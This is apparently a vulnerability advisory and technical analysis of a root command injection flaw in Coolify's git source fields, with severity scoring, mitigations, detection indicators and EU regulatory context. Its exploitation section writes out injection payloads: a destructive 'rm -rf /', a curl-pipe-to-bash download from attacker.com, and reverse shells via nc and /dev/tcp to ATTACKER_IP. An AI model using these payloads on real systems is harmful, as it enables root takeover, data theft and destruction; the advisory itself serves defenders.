Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a command injection vulnerability exists in the git source input fields of a resource, allowing a low privileged user (member) to execute system commands as root on the Coolify instance. As of time of publication, it is unclear if a patch is available.
EPSS Score:
0%
Technical Analysis of EUVD-2025-206232 (CVE-2025-64424) – Coolify Command Injection Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
EUVD-2025-206232 (CVE-2025-64424) describes a critical command injection vulnerability in Coolify, an open-source, self-hostable infrastructure management tool. The flaw allows a low-privileged user (member role) to execute arbitrary system commands with root privileges on the underlying Coolify instance by manipulating git source input fields in resource configurations.
CVSS v4.0 Severity Analysis
The vulnerability has been assigned a Base Score of 9.4 (Critical) with the following vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Attack Requirements (AT) | None (N) | No prior access or conditions needed beyond low-privilege credentials. |
| Privileges Required (PR) | Low (L) | Only requires a "member" role (low-privileged user). |
| User Interaction (UI) | None (N) | No user interaction required. |
| Vulnerable System Confidentiality (VC) | High (H) | Full compromise of sensitive data (e.g., credentials, configurations). |
| Vulnerable System Integrity (VI) | High (H) | Arbitrary command execution allows full system modification. |
| Vulnerable System Availability (VA) | High (H) | Attacker can disrupt or destroy the Coolify instance. |
| Subsequent System Confidentiality (SC) | High (H) | Lateral movement possible to other systems in the network. |
| Subsequent System Integrity (SI) | High (H) | Persistent backdoors or malware can be installed. |
| Subsequent System Availability (SA) | High (H) | Full denial-of-service (DoS) or ransomware deployment possible. |
Severity Justification
- Critical Impact: The vulnerability enables remote code execution (RCE) as root, leading to full system compromise.
- Low Barrier to Exploitation: Only requires a low-privileged account, making it accessible to insiders or attackers with stolen credentials.
- High Exploitability: No user interaction or complex conditions are needed.
- Widespread Risk: Coolify is widely used in self-hosted DevOps environments, increasing the attack surface.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability stems from improper input sanitization in Coolify’s git source configuration fields (e.g., repository URL, branch, or commit hash). An attacker can inject malicious shell commands via:
- Git repository URL (e.g.,
https://github.com/legit/repo; id;) - Branch/Tag names (e.g.,
main; rm -rf /) - Commit hashes (e.g.,
a1b2c3d4; nc -e /bin/sh <ATTACKER_IP> 4444)
Step-by-Step Exploitation
- Attacker Gains Low-Privilege Access
- Obtains credentials for a "member" account (e.g., via phishing, credential stuffing, or insider threat).
- Identifies a Vulnerable Resource
- Navigates to a resource configuration (e.g., application, database, or service) that uses a git source.
- Injects Malicious Payload
- Modifies the git repository URL, branch, or commit hash to include a command injection payload:
https://github.com/legit/repo; curl http://attacker.com/malware.sh | bash
- Modifies the git repository URL, branch, or commit hash to include a command injection payload:
- Triggers Command Execution
- Coolify processes the input without proper sanitization, executing the injected command as root.
- Post-Exploitation
- Lateral Movement: Compromises other systems in the network.
- Persistence: Installs backdoors (e.g., reverse shells, cron jobs).
- Data Exfiltration: Steals sensitive data (e.g., API keys, database credentials).
- Ransomware Deployment: Encrypts critical files and demands payment.
Proof-of-Concept (PoC) Example
# Malicious git repository URL
git_repo = "https://github.com/legit/repo; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Coolify processes this as:
git clone https://github.com/legit/repo; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Result: A reverse shell is established to the attacker’s machine with root privileges.
3. Affected Systems and Software Versions
Vulnerable Versions
- Coolify ≤ v4.0.0-beta.434
- All prior versions are assumed vulnerable unless patched.
Affected Components
- Git Source Input Fields (used in resource configurations for applications, databases, and services).
- Self-hosted Coolify instances (cloud or on-premise deployments).
Not Affected
- Coolify v4.0.0-beta.435+ (if a patch is released).
- Managed Coolify services (if the provider has applied mitigations).
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply Patches (If Available)
- Monitor Coolify’s GitHub Security Advisories for updates.
- Upgrade to v4.0.0-beta.435+ (or the latest patched version) as soon as possible.
-
Temporary Workarounds
- Restrict Git Source Modifications:
- Disable git source editing for low-privileged users via role-based access control (RBAC).
- Enforce whitelisting of trusted git repositories.
- Network-Level Protections:
- Isolate Coolify instances in a dedicated VLAN with strict firewall rules.
- Block outbound connections from Coolify to untrusted IPs.
- Input Sanitization:
- Manually validate git repository URLs, branches, and commit hashes before processing.
- Use regular expressions to block command injection patterns (e.g.,
;,|,&&).
- Restrict Git Source Modifications:
-
Monitoring and Detection
- Log and Alert on Suspicious Git Inputs:
- Monitor for unusual characters (
;,|,$(,`) in git fields. - Set up SIEM alerts for command execution attempts.
- Monitor for unusual characters (
- Audit User Activities:
- Review member account actions for unauthorized git source modifications.
- Enable detailed logging for all Coolify operations.
- Log and Alert on Suspicious Git Inputs:
-
Long-Term Hardening
- Principle of Least Privilege (PoLP):
- Restrict "member" roles to read-only access where possible.
- Implement just-in-time (JIT) access for sensitive operations.
- Containerization & Isolation:
- Run Coolify in a containerized environment (e.g., Docker) with non-root privileges.
- Use seccomp, AppArmor, or SELinux to restrict process capabilities.
- Regular Vulnerability Scanning:
- Use tools like Trivy, OpenVAS, or Nessus to detect unpatched Coolify instances.
- Principle of Least Privilege (PoLP):
5. Impact on the European Cybersecurity Landscape
Regulatory and Compliance Risks
- GDPR (General Data Protection Regulation):
- A successful exploit could lead to unauthorized data access, triggering mandatory breach notifications (Art. 33) and potential fines (up to 4% of global revenue or €20M, whichever is higher).
- NIS2 Directive (Network and Information Security):
- Critical infrastructure operators (e.g., cloud providers, financial institutions) using Coolify may face enhanced reporting obligations and audits.
- DORA (Digital Operational Resilience Act):
- Financial entities must ensure third-party risk management, including vulnerabilities in self-hosted tools like Coolify.
Threat Landscape Implications
- Increased Attack Surface for SMEs & Enterprises:
- Coolify is popular among European SMEs and startups for self-hosted DevOps, making them prime targets for attackers.
- Supply Chain Risks:
- If Coolify is used to manage CI/CD pipelines, an attacker could poison builds or deploy malicious artifacts.
- Ransomware & Extortion:
- Root-level access enables ransomware deployment, which has been a growing threat in Europe (e.g., LockBit, BlackCat).
- State-Sponsored & APT Activity:
- Nation-state actors may exploit this vulnerability for espionage or sabotage (e.g., targeting critical infrastructure).
ENISA & National CERT Considerations
- ENISA (European Union Agency for Cybersecurity):
- May issue alerts or advisories for EU member states.
- Could recommend mandatory patching for critical sectors.
- National CERTs (e.g., CERT-EU, BSI, ANSSI):
- Likely to prioritize this vulnerability in threat intelligence reports.
- May conduct proactive scans to identify vulnerable Coolify instances.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability arises from insufficient input validation in Coolify’s git source handling logic. Specifically:
- Unsanitized User Input: Git repository URLs, branches, and commit hashes are directly passed to shell commands without proper escaping.
- Privilege Escalation: Coolify runs certain operations as root, allowing injected commands to execute with full system privileges.
- Lack of Context-Aware Sanitization: The application does not distinguish between legitimate git parameters and malicious payloads.
Exploit Chaining Potential
This vulnerability can be chained with other exploits for greater impact:
- Initial Access:
- Phishing → Credential theft → Low-privileged Coolify access.
- Privilege Escalation:
- Command injection → Root access → Full system compromise.
- Lateral Movement:
- Access to internal networks, databases, or cloud environments.
- Persistence & Exfiltration:
- Install backdoors, keyloggers, or data exfiltration tools.
Detection & Forensic Indicators
| Indicator | Description |
|---|---|
| Unusual Git URLs | Repository URLs containing ;, ` |
| Unexpected Processes | bash, sh, nc, python, or curl spawned by the Coolify process. |
| Network Connections | Outbound connections to untrusted IPs (e.g., attacker-controlled C2 servers). |
| File System Changes | Unexpected files in /tmp, /var/tmp, or /root. |
| Log Entries | Coolify logs showing malformed git inputs or command execution attempts. |
Reverse Engineering & Patch Analysis
If a patch is released, security teams should:
- Diff the Patched Version:
- Compare
v4.0.0-beta.434withv4.0.0-beta.435to identify input sanitization fixes.
- Compare
- Check for:
- Escaping of shell metacharacters (e.g.,
escapeshellarg()in PHP,shlex.quote()in Python). - Use of parameterized commands instead of direct shell execution.
- Privilege dropping (e.g., running git operations as a non-root user).
- Escaping of shell metacharacters (e.g.,
Recommended Tools for Analysis
| Tool | Purpose |
|---|---|
| Burp Suite / OWASP ZAP | Intercept and modify git source inputs to test for injection. |
| Ghidra / IDA Pro | Reverse-engineer Coolify’s binary to analyze command execution logic. |
| Wireshark / tcpdump | Monitor network traffic for reverse shells or data exfiltration. |
| Auditd / Sysmon | Track process execution and file modifications. |
| Trivy / Grype | Scan Coolify containers for vulnerabilities. |
Conclusion & Recommendations
Key Takeaways
- Critical Severity: EUVD-2025-206232 is a high-impact, easily exploitable vulnerability with root-level consequences.
- Low Attack Complexity: Only requires low-privileged access, making it a high-risk threat for organizations.
- Widespread Impact: Affects European SMEs, DevOps teams, and critical infrastructure using Coolify.
- Regulatory Risks: Non-compliance with GDPR, NIS2, and DORA could result in fines and legal action.
Action Plan for Organizations
- Patch Immediately (if available) or apply workarounds.
- Restrict Access to git source modifications for low-privileged users.
- Monitor & Detect suspicious activities in Coolify logs.
- Isolate & Harden Coolify instances to limit lateral movement.
- Engage with ENISA/CERTs for regional threat intelligence.
Final Warning
Given the severity and ease of exploitation, this vulnerability should be treated as an emergency in affected environments. Unpatched Coolify instances are at high risk of compromise, with potential for data breaches, ransomware, and supply chain attacks.
Security teams are advised to act swiftly to mitigate this threat.
References
Affected Products
coolify
Version: ≤ 4.0.0-beta.434
Vendors
coollabsio